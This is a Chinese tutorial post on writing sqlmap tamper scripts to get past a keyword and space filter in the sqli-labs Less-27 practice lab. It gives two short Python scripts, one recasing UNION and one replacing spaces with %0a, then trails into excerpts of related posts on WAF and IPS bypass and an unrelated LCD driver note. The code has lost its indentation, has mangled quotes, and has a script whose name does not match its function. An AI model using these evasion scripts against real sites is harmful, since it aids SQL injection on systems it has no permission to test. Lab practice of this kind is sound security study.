sqlmap-tamper编写小结

目的:修改sqlmap中的tamper脚本来绕过代码对特定参数的过滤和转义

环境:win10、phpstudy2016、sqli-labs-master平台

工具:sqlmap、burpsuite

地址:http://127.0.0.1/sqli-labs-master/Less-27/?id=1

该页面过滤了select和空格,自定义脚本selec2SEleCT.py和space2%0a.py

selec2SEleCT.py脚本内容如下所示:

#!/usr/bin/env python  #定义解析器

from lib.core.enums import PRIORITY  #导包

__priority__ = PRIORITY.HIGHEST     #设置优先级

def dependencies():           #结构一致化
pass                  #占位符

def tamper(payload, **kwargs):      #定义tamper方法

return payload.replace("UNION", "UniON") if payload else payload  #使用UniON替换UNION

space2%0a.py脚本内容如下所示:

#!/usr/bin/env python

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
pass

def tamper(payload, **kwargs):

retVal = payload

if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False

for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "%0a"
continue

elif payload[i] == ‘\‘‘:
quote = not quote

elif payload[i] == ‘"‘:
doublequote = not doublequote

elif payload[i] == " " and not doublequote and not quote:
retVal += "%0a"
continue

retVal += payload[i]

return retVal

用sqlmap直接跑,相关参数如下所示

时间: 2024-10-02 02:37:54

sqlmap-tamper编写小结的相关文章

sqlmap tamper编写

#!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies()

记一份SQLmap使用手册小结(二)

前言 上一篇文章:记一份SQLmap使用手册小结(一) 希望各位大佬轻喷(QAQ) 首发先知社区:https://xz.aliyun.com/t/3011 其他高级 用户自定义函数注入 参数:–udf-inject,–shared-lib 你可以通过编译MySQL注入你自定义的函数(UDFs)或PostgreSQL在windows中共享库,DLL,或者Linux/Unix中共享对象, sqlmap将会问你一些问题,上传到服务器数据库自定义函数,然后根据你的选择执行他们,当你注入完成后,sqlma

sqlmap tamper绕过安全狗

可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def

SQLMAP tamper WAF 绕过脚本列表注释

sqlmap的tamper目录下有41个用于绕过waf的脚本,网上有文章简要介绍过使用方法,但是只是简单说了其中少数几个的作用.本人通过这41个脚本的文档注释,将它们每一个的作用简单标记了一下,还是像之前一样,先 google translate 再人工润色.其实,文档注释里面都有例子,看一眼就大概知道效果了,比看文字描述速度还快,只不过要用的时候现场翻看还是太麻烦了.我这个列表可以给大家提供参考,来更迅速的定位自己需要的脚本. 本人英文阅读能力有限,有个别词句(其实就2处)实在拿捏不准该如何翻

Sqlmap Tamper大全

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入.其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令.在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击. 本

SQLmap使用手册小结(二)

其他高级 用户自定义函数注入 参数:–udf-inject,–shared-lib 你可以通过编译MySQL注入你自定义的函数(UDFs)或PostgreSQL在windows中共享库,DLL,或者Linux/Unix中共享对象, sqlmap将会问你一些问题,上传到服务器数据库自定义函数,然后根据你的选择执行他们,当你注入完成后,sqlmap将会移除它们. 系统文件操作 从数据库服务器中读取文件 参数:–file-read 当数据库为MySQL,PostgreSQL或Microsoft SQL

sqlmap tamper脚本扩展开发(Bypass IPS)

首先先对比一下两个自带的tamper脚本,看看sqlmap调用tamper有没有依赖什么类库或者算法. 例如调用tamper是导入之后调用脚本里的某函数,那么我们开发的tamper脚本也应该有调用要用到的函数,主要看算法吧,咳咳 先来看看base64encode.py #!/usr/bin/env python """ Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LI

JAVA初步——环境搭建和专业术语解释,helloworld程序编写小结

Java编程语言初体验 一.前言 相关专业术语简介 1.软件开发--即一系列按照指定顺序组织的计算机数据和指令的集.合.分为系统软件和应用软件. 2.人机交互方式:命令行(Linux系统).图形化界面(Windows) 3.常用的DOS命令:使用窗口键+r打开,输入cmd按回车/确定可以进入DOS界面 dir: 列出当前目录下的文件以及文件夹md: 创建目录rd: 删除目录cd: 进入指定目录cd.. 退回到上一级目录cd\: 退回到根目录del: 删除文件exit:退出dos命令行 4.计算机

[转]LCD驱动编写小结及BSWP 和 HWSWP的作用

在设置lcdcon5时遇到BSWP 和 HWSWP两个使能位,知道是高低位互换,但真是有什么用倒没想到,下面转载的这篇文章略有提及,参考一下========================================== 3.1 背光:对于大部分的彩色LCD一定要接背光,我们才能看到屏上的内容: 3.2 控制信号:不同的LCD厂商对于控制信号有不同的叫法, VFRAME:LCD控制器和LCD驱动器之间的帧同步信号.该信号告诉LCD屏的新的一帧开始了.LCD控制器在一个完整帧显示完成后立即插入